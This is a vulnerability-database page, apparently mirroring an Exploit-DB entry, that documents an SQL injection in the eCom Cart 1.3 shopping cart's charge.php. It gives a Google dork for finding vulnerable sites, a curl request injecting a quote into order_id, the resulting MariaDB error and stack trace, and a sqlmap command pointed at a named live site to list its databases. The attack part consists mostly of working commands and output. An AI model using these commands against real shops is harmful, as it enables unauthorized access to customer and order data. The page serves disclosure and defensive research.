Lucene search

K

eCom Cart 1.3 - SQL Injection

๐Ÿ—“๏ธย 10 Jun 2017ย 00:00:00Reported byย Alperen Eymen OzcanTypeย 
exploitdb
ย exploitdb
๐Ÿ”—ย www.exploit-db.com๐Ÿ‘ย 55ย Views

eCom Cart 1.3 SQL Injection on charge.ph

Show more
Code
# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
# Version: 1.3
# Tested on: Linux



$ curl http://localhost/ecom-cart/charge.php -d order_id=%271

Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16

$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Jun 2017 00:00Current
7.4High risk
Vulners AI Score7.4
55
.json
Report